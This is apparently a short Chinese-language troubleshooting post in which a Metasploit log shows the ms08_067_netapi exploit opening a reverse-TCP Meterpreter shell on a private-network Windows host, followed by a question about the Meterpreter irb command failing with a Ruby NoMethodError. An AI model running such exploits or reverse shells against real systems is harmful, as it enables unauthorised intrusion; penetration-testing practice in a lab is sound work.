msf6 exploit(windows/smb/ms08_067_netapi)> run[*]Started reverse TCP handler on 192.168.1.113:4444 [*]192.168.1.115:445-Attempting to trigger the vulnerability... [*]Sending stage (175174 bytes) to 192.168.1.115 [*]Meterpreter session 5 opened (192.168.1.113:4444->192.168.1.115:1492) at 2021-05-0921:36:56+0800meterpreter >
问题描述:
进入ruby命令行后,无法运行,提示错误
meterpreter > irb [*]StartingIRB shell... [*]You are in the "client"(session) object >>2[-]Error running command irb:NoMethodError undefined method `in_pasting?' forReline::ANSI:Class